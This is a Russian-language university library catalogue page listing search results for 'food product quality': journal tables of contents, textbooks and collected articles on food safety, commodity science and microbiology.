Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

100 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 20
1. 
Пищевая промышленность. - Журнал, 2013г. № 5
Оглавление 
  • Безопасность производства продуктов питания. - с.8-56
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ - ПРОИЗВОДСТВО, КАЧЕСТВО ОБЩЕСТВЕННОГО ПИТАНИЯ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
2. 
Пищевая промышленность. - Журнал, 2008г. № 11
Оглавление 
  • Итоги работы предприятий пищевой промышленности России за январь - август 2008. - с.6-7
    Кл. слова: ПРЕДПРИЯТИЕ ПЕРЕРАБАТЫВАЮЩЕЕ, ПРЕДПРИЯТИЕ ПИЩЕВОЕ, ДАННЫЕ СТАТИСТИЧЕСКИЕ
  • Недорезова, Е. Контроль качества пищевых продуктов в системе технического регулирования / Е. Недорезова. - с.8-10
    Кл. слова: СИСТЕМА ТЕХНИЧЕСКОГО РЕГУЛИРОВАНИЯ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Шилов, Г. Ю. Основные системы обеспечения качества и безопасности пищевой продукции / Г. Ю. Шилов, И. Н. Лейнсон, А. И. Подлесный. - с.12-14
    Кл. слова: СИСТЕМА КАЧЕСТВА, БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВ
  • Сергеева, Л. С. Обновление стандартов по стеклянной таре - обеспечение выполнения требований ФЗ "О техническом регулировании" / Л. С. Сергеева. - с.18-20
    Кл. слова: ТАРА СТЕКЛЯННАЯ, РЕГУЛИРОВАНИЕ ТЕХНИЧЕСКОЕ
  • Новый молочный стандарт в России. - с.21
    Кл. слова: ПРОДУКТ УЛЬТРАПАСТЕРИЗОВАННЫЙ, МОЛОКО - ГОСТ
  • Гореньков, Э. С. Проекты национальных стандартов на плодоовощные консервы для детского питания / Э. С. Гореньков, Л. К. Пацюк, О. Н. Лукашевич. - с.24-25
    Кл. слова: ПИТАНИЕ ДЕТЕЙ - МАРКИРОВКА, ПИТАНИЕ ДЕТЕЙ - СЕРТИФИКАЦИЯ
  • Семенов, Г. В. Современное оборудование производства сублимированных продуктов / Г. В. Семенов, Е. В. Буданцев, М. С. Булкин. - с.34-37
    Кл. слова: ОБОРУДОВАНИЕ ПРОИЗВОДСТВЕННО, ПРОДУКТ СУБЛИМИРОВАННЫЙ
  • Хуршудян, С. А. Матрица маркеров и ее применение для идентификации коньячной продукции / С. А. Хуршудян, Б. Ц. Зайчик. - с.41-42
    Кл. слова: МАТРИЦА МАРКЕРОВ, ПРОДУКЦИЯ КОНЬЯЧНАЯ
  • Иванова, Т. Н. Электрохимическая активация для регулирования кислотности молока / Т. Н. Иванова, М. А. Тарасова, О. В. Мартынова. - с.46-48
    Кл. слова: МОЛОКО - КАЧЕСТВО
  • Колмакова, Н. С. Последние исследования в области безопасности синтетических красителей и тенденции развития рынка / Н. С. Колмакова. - с.5657
    Кл. слова: КРАСИТЕЛЬ ПИЩЕВОЙ, КРАСИТЕЛЬ СИНТЕТИЧЕКСИЙ, ИНГРЕДИЕНТ ПИЩЕВОЙ
  • Бакуменко, О. Е. Изучение фактического питания учащихся вуза / О. Е. Бакуменко, А. Ф. Доронин. - с.66-67
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
Держатели документа (Информация об экземплярах) 
3. 
Пищевая промышленность. - Журнал, 2006г. № 6
Оглавление 
  • Хлыновский, М. Д. Экологические вспомогательные материалы для повышения биологической стойкости пива и напитков / М. Д. Хлыновский. - с.17-19
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь - март 2006 г.. - с.24-25
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ
  • Инновационные продукты из экструдера. - с.34-35
  • Еганян, А. Г. Улучшение качества продуктов питания как основа повышения конкурентоспособности / А. Г. Еганян. - с.52-53
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Пономарев, А. Н. Научный подход к формированию системы качества продукции / А. Н. Пономарев. - с.54
Держатели документа (Информация об экземплярах) 
4. 
Товароведение пищевых продуктов [Текст] / И. Е. Кононенко [и др.], 1983. - 423 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ -- МАРГАРИН
Держатели документа (Информация об экземплярах) 
5. 
Товаровед продовольственных товаров. - Журнал, 2012г. № 4
Оглавление 
  • Елисеева, Л.Г.. Сравнительная характеристика потребительских свойств ореховых снеков / Л.Г. Елисеева. - с.6-9
    Кл. слова: СНЕКИ, ОРЕХИ, БЫСТРОЕ ПИТАНИЕ
  • Потороко, И.Ю.. Использование электрофизических методов при производстве и контроле качества пищевых продуктов / И.Ю. Потороко, Н.И. Пилипенко. - с.33-37
    Кл. слова: ФИЗИКО- ХИМИЧЕСКИЕ МЕТОДЫ ИССЛЕДОВАНИЯ, КОНТРОЛЬ КАЧЕСТВА ПИЩЕВЫХ ПРОДУКТОВ
  • Белкин, Ю.Д.. Обзор современных методов идентификации коньяков и бренди, применяемых в отечественной и зарубежной практике / Ю.Д. Белкин, М. А. Положишникова. - с.45-49
    Кл. слова: ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ
  • Вытовтов, А.А.. Нормативно-технические документы - элементы идентификации, потверждения соответствия, экспертизы и оценки качества пищевых продуктов / А.А. Вытовтов. - с.69-72
    Кл. слова: ПОДТВЕРЖДЕНИЕ СООТВЕТСТВИЯ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, НОРМАТИВНО-ТЕХНИЧЕСКИЕ ДОКУМЕНТЫ
6. 
Товаровед продовольственных товаров. - Журнал, 2012г. № 5
Оглавление 
  • Николаева, М.А.. Здоровое питание как основа здоровья нации / М.А. Николаева, О.Д. Худякова. - с.25-30
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, Питание здоровое
  • Воробьев, В.В.. Проблемы безопасности и качества лососевой икры / В.В. Воробьев, И.Н. Янченко. - с.31-36
    Кл. слова: ТОВАРОВЕДЕНИЕ РЫБНЫХ ТОВАРОВ
7. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2007г. № 1
Оглавление 
  • Алехина, Л. В. Новые вкусоароматические добавки компании "APOMAPOC-M" для снэковой и пищеконцентратной промышленности / Л. В. Алехина, Е. В. Мансветова, О. Н. Олейникова. - с.15
  • Ковалева, Л. Н. Новые национальные стандарты на пищевые добавки / Л. Н. Ковалева, Д. К. Кулев. - с.18
  • Тимощенко, Ю. А. Лецитины в производстве изделий из замороженного дрожжевого слоеного теста / Ю. А. Тимощенко, К. А. Пелевина, В. И. Игнатов. - с.22-24
    Кл. слова: ТЕСТО ДРОЖЖЕВОЕ
  • Бризанов Л. и,. Верный шаг на пути к комфорту - новые технические условия на колбасные изделия / Л. и, Бризанов, И. И. Овчинникова, А. Ф. Прожога. - с.26-27
    Кл. слова: ИЗДЕЛИЯ КОЛБАСНЫЕ
  • Инновационные ароматы Qpearl release совершают переворот в производстве жевательной резинки. - с.28
    Кл. слова: РЕЗИНКА ЖЕВАТЕЛЬНАЯ
  • Панов, Д. П. Обогащение продуктов питания массового потребления / Д. П. Панов. - с.30-31
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ
  • Бакулина, О. Н. Ингредиенты для индустрии здорового питания / О. Н. Бакулина, Т. Н. Некрасова. - с.32-34
    Кл. слова: ПИТАНИЕ ЗДОРОВОЕ
  • Комамонд, Ш. Живем, чтобы есть, или едим, чтобы жить? / Ш. Комамонд. - с.36-37
    Кл. слова: КАЧЕСТВО ПИЩИ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Алиева, Л. Р. Хитозан и молочные продукты / Л. Р. Алиева, С. С. Алиев. - с.38-39
    Кл. слова: ПРОДУКТЫ МОЛОЧНЫЕ - ПРОИЗВОД
  • Новинюк, Л. В. Цитраты аммония-железа - эффективные источники биодоступного железа / Л. В. Новинюк. - с.40
  • Михайлов, В. Е. Euro Vanilin Plus - новый продукт компании Borregaard Ingredients / В. Е. Михайлов. - с.46-47
  • Волков, М. Ю. Эффективные формы пробиотиков, иммобилизованных на природных адсорбентах / М. Ю. Волков. - с.48-51
  • Кисиль, Н. Н. Исследование биологически активных добавок к пище / Н. Н. Кисиль. - с.52-53
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Каргина, Е. Б. Системы обеспечения безопасности производства на основе принципов НАССР / Е. Б. Каргина, Е. А. Васюта. - с.54-55
    Кл. слова: НАССР
  • Красникова, Е. В. Современные методы контроля синтетических красителей в пищевых продуктах / Е. В. Красникова, Н. В. Рудометова. - с.56
    Кл. слова: КРАСИТЕЛЬ ПИЩЕВОЙ
  • Евелева, В. В. Получение и применение пищевых добавок на основе молочной кислоты и ее производных / В. В. Евелева. - с.58-60
    Кл. слова: ДОБАВКА ПИЩЕВАЯ - ПРОИЗВОДСТВО
  • Шарова, Н. Ю. Влияние состава питательной среды на биосинтез ингибиторов а-гликозидаз штаммами актиномицетов / Н. Ю. Шарова, Т. А. Никифорова, О. А. Ходкевич. - с.61-63
  • Новинюк, Л. В. Получение комплексных цитрат - и лактатсодержащих добавок для обогащения пищевых продуктов минеральными веществами / Л. В. Новинюк, И. Б. Новицкая, Д. Х. Кулев. - с.64
Держатели документа (Информация об экземплярах) 
8. 
Роспотребнадзор в Омской области. - Журнал, 2013г. № 6
Оглавление 
  • Лавринова, Е. В. Отказ от курения - шаг к здоровому образу жизни / Е. В. Лавринова. - с.2-4
    Кл. слова: ЗДОРОВЫЙ ОБРАЗ ЖИЗНИ, КУРЕНИЕ - ПРОФИЛАКТИКА
  • О качестве и безопасности пищевых продуктов, производимых и реализуемых не территории Омской области. - с.10-12
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Пуртова, И. Н. 1 декабря - Всемирный день борьбы против СПИДа / И. Н. Пуртова. - с.13-14
    Кл. слова: СПИД - ПРОФИЛАКТИКА, 1 ДЕКАБРЯ - ВСЕМИРНЫЙ ДЕНЬ БОРЬБЫ ПРОТИВ СПИДА
  • Кухта, В. Е. Подготовка педагогов по проблеме ВИЧ-инфекции как основа превентивной деятельности среди учащихся / В. Е. Кухта. - с.15-16
    Кл. слова: ВИЧ - ИНФЕКЦИЯ - ПРОФИЛАКТИКА
  • Екимова, О. С. Судебная защита прав потребителей / О. С. Екимова. - с.21-23
    Кл. слова: ЗАЩИТА ПРАВ ПОТРЕБИТЕЛЕЙ
  • Верещагин, Д. И. Оперативное слежение за заболеваемостью острыми респираторными вирусными инфекциями и гриппом в Омской области / Д. И. Верещагин, О. А. Михайлова, Н. В. Резанова. - с.24-25
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ЗДРАВООХРАНЕНИЕ, ИНФЕКЦИЯ ВИРУСНАЯ, ГРИПП
  • Летюшев, А. Н. Так ли безобидны комары? К вопросу о заболеваемости дирофиляриозом / А. Н. Летюшев. - с.26-28
    Кл. слова: КОМАР, дирофиляриоз
  • Добровольская, Л. Г. Пестициды и их влияние на здоровье человека / Л. Г. Добровольская, Е. М. Зубкова, Л. Б. Прощалыгина. - с.29-30
  • Спиридонова, Ю. А. Актуальные вопросы экспертизы рабочих мест работников при подозрении на профессиональное заболевание / Ю. А. Спиридонова, Л. И. Богданова. - с.31-32
    Кл. слова: ЗАБОЛЕВАНИЕ ПРОФЕССИОНАЛЬНОЕ, МЕСТО РАБОЧЕЕ
Держатели документа (Информация об экземплярах) 
9. 
Товаровед продовольственных товаров. - Журнал, 2013г. № 6
Оглавление 
  • Табаторович, А. И.. Разработка и оценка качества обогащенного желейного мармелада с добавлением настоя гибискуса / А. И. Табаторович, О. Д. Худякова. - с.4-11
    Кл. слова: ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ
  • Худякова, О. Д.. Влияние качества продуктов питания и факторов окружающей среды на состояние здоровья населения Омской области / О. Д. Худякова. - с.21-24
    Кл. слова: ЗДОРОВОЕ ПИТАНИЕ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Резго, Г. Я.. Продовольственная безопасность - одна из проблем развития потребительского рынка России / Г. Я. Резго. - с.32-28, ПОТРЕБИТЕЛЬСКИЙ РЫНОК, ПРОДОВОЛЬСТВЕННАЯ БЕЗОПАСНОСТЬ
  • Николаева, М. А.. Анализ ассортимента продуктов спортивного питания на рынке города Омска / М. А. Николаева, М. С. Худяков. - с.47-50
    Кл. слова: Питание спортивное, ТОРГОВАЯ МАРКА
  • Рябова, Д. С.. Анализ потребительских предпочтений на рынке сырных продуктов / Д. С. Рябова, С. В. Бессонова. - с.51-55
    Кл. слова: РЫНОК СЫРА
10. 
Товароведение пищевых продуктов [Текст] / В. Б. Тылкин [и др.] ; ред. В. Б. Тылкин, 1980. - 429 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ
Держатели документа (Информация об экземплярах) 
11. 
Мудрецова-Висс К. А. Основы микробиологии [Текст] / К. А. Мудрецова-Висс, В. П. Дедюхина, Е. В. Масленникова, 2015. - 383 с.
Ключевые слова 
МИКРОБИОЛОГИЯ -- БАКТЕРИИ -- ВИРУС - МИКРОБИОЛОГИЯ -- ФАГИ -- ГРИБЫ - МИКРОБИОЛОГИЯ -- ДРОЖЖИ - МИКРОБИОЛОГИЯ -- МИКРООРГАНИЗМЫ -- ПРОЦЕСС БИОХИМИЧЕСКИЙ -- ПРОЦЕСС АНАЭРОБНЫЙ -- ПРОЦЕСС АЭРОБНЫЙ -- ФАКТОР АБИОТИЧЕСКИЙ -- ФАКТОР БИОТИЧЕСКИЙ -- МИКРООРГАНИЗМ ПАТОГЕННЫЙ -- ИНФЕКЦИЯ ПИЩЕВАЯ -- ОТРАВЛЕНИЕ ПИЩЕВОЕ -- ПРОФИЛАКТИКА ПИЩЕВЫХ ЗАБОЛЕВАНИЙ -- КОНТРОЛЬ МИКРОБИОЛОГИЧЕСКИЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- МИКРОФЛОРА ПОЧВЫ -- МИКРОФЛОРА ВОДЫ -- МИКРОФЛОРА ВОЗДУХА -- МИКРОФЛОРА ТАРЫ -- МИКРОФЛОРА УПАКОВОЧНЫХ МАТЕРИАЛОВ -- МИКРОФЛОРА ТЕЛА ЧЕЛОВЕКА -- МИКРОБИОЛОГИЯ МОЛОКА -- МИКРОБИОЛОГИЯ МОЛОЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ МЯСА -- МИКРОБИОЛОГИЯ КОЛБАСНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ЯИЦ -- МИКРОБИОЛОГИЯ ЯИЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ РЫБЫ -- МИКРОБИОЛОГИЯ РЫБОПРОДУКТОВ -- МИКРОБИОЛОГИЯ КРУПЫ -- МИКРОБИОЛОГИЯ МУКИ -- МИКРОБИОЛОГИЯ МАКАРОННЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ХЛЕБА -- МИКРОБИОЛОГИЯ ОВОЩЕЙ -- МИКРОБИОЛОГИЯ КОНДИТЕРСКИХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ВКУСОВЫХ ТОВАРОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПРЯНОСТИ -- СОЛЬ ПОВАРЕННАЯ -- МИКРОБИОЛОГИЯ КУЛИНАРНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ КОНСЕРВОВ -- ГИГИЕНА ПИЩЕВЫХ ПРОДУКТОВ -- САНИТАРИЯ - ТОРГОВЛЯ
Держатели документа (Информация об экземплярах) 
12. 
Сборник статей преподавателей колледжа предпринимательства и права, г. Омск [Текст] : сб. науч. трудов / Колледж предпринимательства и права, 2004. - 244 с.
Оглавление 
  • Авадэни, Ю. И. Предпринимательский стиль управления - путь к формированию конкурентных преимуществ предприятия / Ю. И. Авадэни. - с.3-7
  • Определение роли терминов в научном познании и в подготовке специалистов. - с.7-11
  • Анацкая, А. Г. Информационные технологии в обучении / А. Г. Анацкая. - с.12-16
    Кл. слова: ОБРАЗОВАНИЕ - ИНФОРМАТИЗАЦИЯ
  • Анисова, Л. В. Рынок и конкуренция - главный механизм развития современной экономики / Л. В. Анисова. - с.17-21
  • Баева, Р. Ф. Некоторые проблемы правового образования в Российской Федерации / Р. Ф. Баева. - с.22-25
    Кл. слова: образование правовое
  • Бармотина, Ю. В. Налогообложение расходов вместо налогообложения прибыли / Ю. В. Бармотина. - с.26-31
  • Бондаревская, И. Н. Вредные факторы бытовой среды. Влияние строительных и отделочных материалов на здоровье человека / И. Н. Бондаревская. - с.32-40
    Кл. слова: СРЕДА БЫТОВАЯ - экология, ЖИЛИЩЕ - экология
  • Быкова, И. В. Применение пищевых добавок в пищевой промышленности / И. В. Быкова. - с.41-46
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Васильева, Т. Н. Проведение экспертизы некачественных и опасных продовольственного сырья и пищевых продуктов, их использование или уничтожение / Т. Н. Васильева. - с.47-52
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, ЭКСПЕРТИЗА ПИЩЕВЫХ ПРОДУКТОВ
  • Вебер, Т. Г. Новые виды диетических и хлебобулочных изделий и их роль в питании человека / Т. Г. Вебер. - с.53-55
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ, ХЛЕБ - питание
  • Веселова, Т. И. Ритуал застолья / Т. И. Веселова. - с.56-64
    Кл. слова: ЭТИКЕТ СТОЛОВЫЙ
  • Винокурова, О. Н. Проблемы развития экономической инфраструктуры региона в современных условиях / О. Н. Винокурова. - с.65-73
    Кл. слова: ЗАНЯТОСТЬ ВТОРИЧНАЯ, самозанятость
  • Гаврикова, Г. Т. Нравственные категории в мировоззренческой платформе профессиональной деятельности специалиста-правоведа / Г. Т. Гаврикова. - с.74-78
    Кл. слова: КУЛЬТУРА НРАВСТВЕННАЯ
  • Гайнуллина, Г. А. Роль качества в деле повышения конкурентоспособности продукции / Г. А. Гайнуллина. - с.79-82
    Кл. слова: КАЧЕСТВО ПРОДУКЦИИ, КОНКУРЕНТОСПОСОБНОСТЬ ПРОДУК
  • Гатаулина, Н. И. Работа над словарем профессиональной лексики студентов колледжа / Н. И. Гатаулина, Л. А. Лоскутова. - с.83-88
  • Голубь, Н. Н. Использование нетрадиционных продуктов в питании населения / Н. Н. Голубь. - с.89-93
    Кл. слова: ОРЕХИ - ПИТАНИЕ, семечки - питание, ТОПИНАМБУР - питание
  • Гришина, Е. С. Разработка и исследование десертного продукта функционального назначения / Е. С. Гришина. - с.94-105
  • Калинина, Ю. И. Лесопользование Омской области / Ю. И. Калинина. - с.106-111
  • Кислицына, Т. Ф. Некоторые критерии оценки конкурентоспособности СТО / Т. Ф. Кислицына. - с.112-124
    Кл. слова: ОБСЛУЖИВАНИЕ ТОРГОВОЕ
  • Кобзарь, О. В. Разделение властей как признак правового государства / О. В. Кобзарь. - с.125-129
    Кл. слова: РАЗДЕЛЕНИЕ ВЛАСТЕЙ
  • Колесникова, О. В. Информационные технологии в профессиональной деятельности юриста / О. В. Колесникова. - с.130-132
  • Комарова, В. И. Влияние золоотвалов на подземные и поверхностные воды регионов ГЭС и мероприятия по их охране / В. И. Комарова. - с.133-139
    Кл. слова: ОХРАНА ВОД
  • Крахмалева, Н. А. Современные компьютерные технологии в преподавании математических дисциплин / Н. А. Крахмалева. - с.140-144
  • Куликова, М. Е. Информационные технологии в бухгалтерском учете / М. Е. Куликова. - с.145-149
    Кл. слова: УЧЕТ - АВТОМАТИЗАЦИЯ
  • Курнышова, Н. А. Мерчандайзинг как один из инструментов формирования ассортимента / Н. А. Курнышова ; 150-153
  • Мавруева, Е. Д. Информационные технологии в педагогической деятельности / Е. Д. Мавруева. - с.154-162
  • Маркина, Н. А. Конституционные принципы регулирования трудовых правоотношений / Н. А. Маркина. - с.157-162
  • Муранова, Т. В. Правомерное поведение / Т. В. Муранова. - с.163-168
    Кл. слова: СОЗНАНИЕ ПРАВОВОЕ, ПОВЕДЕНИЕ ПРАВОМЕРНОЕ
  • Норышева, Р. А. Влияние вредных веществ на качество продуктов питания / Р. А. Норышева. - с.169-173
  • Пономарева, О. П. Взаимосвязь финансового и управленческого учета: назначение, принципы организации / О. П. Пономарева. - с.174-183
    Кл. слова: УЧЕТ УПРАВЛЕНЧЕСКИЙ, УЧЕТ ФИНАНСОВЫЙ
  • Сакова, М. Г. Биологическая роль некоторых химических элементов в организме человека / М. Г. Сакова. - с.184-196
    Кл. слова: БИОХИМИЯ человека
  • Самолова, Т. И. Торговая мебель и аксессуары / Т. И. Самолова. - с.197-199
  • Самохина, Н. А. Регулирование финансовых рынков в системе актуальных реформ в сфере государственного управления / Н. А. Самохина. - с.200-205
    Кл. слова: РЫНОК ФИНАНСОВЫЙ - РОССИЯ
  • Судакова, С. Б. Порядок исчисления и уплаты единого социального налога в федеральный бюджет и страховых взносов в Пенсионный фонд России / С. Б. Судакова. - с.206-209
    Кл. слова: РЕФОРМА ПЕНСИОННАЯ - РОССИЯ
  • Ткаченко, О. Л. Рекламные тексты в средствах массовой информации / О. Л. Ткаченко. - с.210-214
    Кл. слова: ТЕКСТ РЕКЛАМНЫЙ
  • Фигурова, С. С. Законность и правопорядок в предпринимательских отношениях. Содержание законности / С. С. Фигурова. - с.215-223
  • Чикишева, Т. В. Проблема бухгалтерского и налогового учета по операциям с векселями. Преимущества расчета векселями / Т. В. Чикишева. - с.224-229
  • Шитова, З. А. Исследование рынка кожаной обуви / З. А. Шитова. - с.230-232
    Кл. слова: рынок обуви
  • Шляпина, Ю. В. Информатизация общества и информационная культура / Ю. В. Шляпина. - с.233-235
    Кл. слова: КУЛЬТУРА ИНФОРМАЦИОННАЯ
  • Юферева, Т. С. Проблема внедрения налогового учета в организации / Т. С. Юферева. - с.236-242
    Кл. слова: УЧЕТ НАЛОГОВЫЙ
Держатели документа (Информация об экземплярах) 
13. 
Качество и безопасность пищевых продуктов [Текст] : [сб. нормат. документов], 2003. - 59 с.
Оглавление 
  • О качестве и безопасности пищевых продуктов: ФЗ от 2 янв. 2000 г. № 29-ФЗ
Держатели документа (Информация об экземплярах) 
14. 
Позняковский, Валерий Михайлович. Гигиенические основы питания и экспертизы продовольственных товаров [Текст] : Учеб. для вузов / Позняковский Валерий Михайлович, 1996. - 432 с.
Держатели документа (Информация об экземплярах) 
15. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
16. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 1 [Текст] / ред. А. И. Барановский, 2012. - 174 с.
Ключевые слова 
Оглавление 
  • Авраменко, К. О. Формат «Free Flow» как инновационное направление в предприятиях индустрии питания / К. О. Авраменко, Н. В. Бураковская. - с.6-7
    Кл. слова: FREE FLOW
  • Агеева, Е. А. Современное состояние и направления развития общественного питания в г. Магнитогорске / Е. А. Агеева, И. А. Долматова. - с.7-12
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ
  • Деменконя, Е. М. Школьное питание как фактор развития здорового поколения / Е. М. Деменконя, М.А. Гриценко. - с.13-16
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Дризнер, Р. А. Современное состояние отрасли общественною питания в г. Екатеринбурге, проблемы кадров, трудоустройства и пути решения / Р. А. Дризнер. - с.16-21
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - КАДРЫ
  • Есина, А. Н. Соответствие испытательной лаборатории "Сертификат" критериям аккредитации / А. Н. Есина. - с.21-25
  • Каня, И. П. Бинарные занятия как средство формирования экспериментальных навыков (из опыта преподавания на технологическом факультете ОмЭИ) / И. П. Каня, О. Ю. Мельникова, А. Н. Королев. - с.25-28
    Кл. слова: ЗАНЯТИЕ БИНАРНОЕ
  • Ковальчук, А. В. Анализ рынка оборудования предприятий питания в России / А. В. Ковальчук, М. А. Шадрин. - с.28-34
    Кл. слова: ОБОРУДОВАНИЕ ПРЕДПРИЯТИЯ ОБЩЕСТВЕННОГО ПИТАНИЯ, РЫНОК ОБОРУДОВАНИЯ ПРЕДПРИЯТИЙ ПИТАНИЯ
  • Конищева, Е. А. Контроль качества меда / Е. А. Конищева, Е. П. Галкова. - с.31-34
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА МЕДА, МЕД
